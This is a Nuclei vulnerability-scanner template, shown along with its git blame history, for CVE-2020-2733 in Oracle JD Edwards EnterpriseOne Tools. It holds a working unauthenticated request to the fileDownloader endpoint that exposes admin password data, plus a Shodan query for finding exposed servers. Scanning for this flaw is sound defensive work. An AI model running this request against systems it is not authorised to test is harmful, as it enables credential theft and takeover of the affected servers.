nuclei-templates/cves/2020/CVE-2020-2733.yaml

id: CVE-2020-2733

info:
  name: JD Edwards EnterpriseOne Tools - Admin Password Disclosure
  author: DhiyaneshDk,pussycat0x
  severity: critical
  description: |
    Vulnerability in the JD Edwards EnterpriseOne Tools product of Oracle JD Edwards (component: Monitoring and Diagnostics). The supported version that is affected is 9.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise JD Edwards EnterpriseOne Tools. Successful attacks of this vulnerability can result in takeover of JD Edwards EnterpriseOne Tools.
  reference:
    - https://redrays.io/cve-2020-2733-jd-edwards/
    - https://www.oracle.com/security-alerts/cpuapr2020.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-2733
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-2733
  metadata:
    shodan-query: port:8999 product:"Oracle WebLogic Server"
    verified: "true"
  tags: cve,cve2020,oracle,weblogic,disclosure,exposure

requests:
  - method: GET
    path:
      - '{{BaseURL}}/manage/fileDownloader?sec=1'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'ACHCJK'

      - type: word
        part: header
        words:
          - "text/plain"

      - type: status
        status:
          - 200
Create CVE-2020-2733.yaml 2022-09-21 10:10:52 +00:00			`id: CVE-2020-2733`

			`info:`
Update CVE-2020-2733.yaml 2022-09-21 11:29:41 +00:00			`name: JD Edwards EnterpriseOne Tools - Admin Password Disclosure`
Create CVE-2020-2733.yaml 2022-09-21 10:10:52 +00:00			`author: DhiyaneshDk,pussycat0x`
			`severity: critical`
Update CVE-2020-2733.yaml 2022-09-21 11:29:41 +00:00			`description: \|`
			`Vulnerability in the JD Edwards EnterpriseOne Tools product of Oracle JD Edwards (component: Monitoring and Diagnostics). The supported version that is affected is 9.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise JD Edwards EnterpriseOne Tools. Successful attacks of this vulnerability can result in takeover of JD Edwards EnterpriseOne Tools.`
Create CVE-2020-2733.yaml 2022-09-21 10:10:52 +00:00			`reference:`
			`- https://redrays.io/cve-2020-2733-jd-edwards/`
			`- https://www.oracle.com/security-alerts/cpuapr2020.html`
			`- https://nvd.nist.gov/vuln/detail/CVE-2020-2733`
Update CVE-2020-2733.yaml 2022-09-21 11:29:41 +00:00			`classification:`
Auto Generated CVE annotations [Thu Sep 22 10:23:59 UTC 2022] :robot: 2022-09-22 10:23:59 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
Update CVE-2020-2733.yaml 2022-09-21 11:29:41 +00:00			`cve-id: CVE-2020-2733`
Create CVE-2020-2733.yaml 2022-09-21 10:10:52 +00:00			`metadata:`
Update CVE-2020-2733.yaml 2022-09-21 11:29:41 +00:00			`shodan-query: port:8999 product:"Oracle WebLogic Server"`
Auto Generated CVE annotations [Thu Sep 22 10:23:59 UTC 2022] :robot: 2022-09-22 10:23:59 +00:00			`verified: "true"`
Update CVE-2020-2733.yaml 2022-09-22 10:04:43 +00:00			`tags: cve,cve2020,oracle,weblogic,disclosure,exposure`
Create CVE-2020-2733.yaml 2022-09-21 10:10:52 +00:00
			`requests:`
			`- method: GET`
			`path:`
			`- '{{BaseURL}}/manage/fileDownloader?sec=1'`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- 'ACHCJK'`

			`- type: word`
			`part: header`
			`words:`
			`- "text/plain"`

			`- type: status`
			`status:`
			`- 200`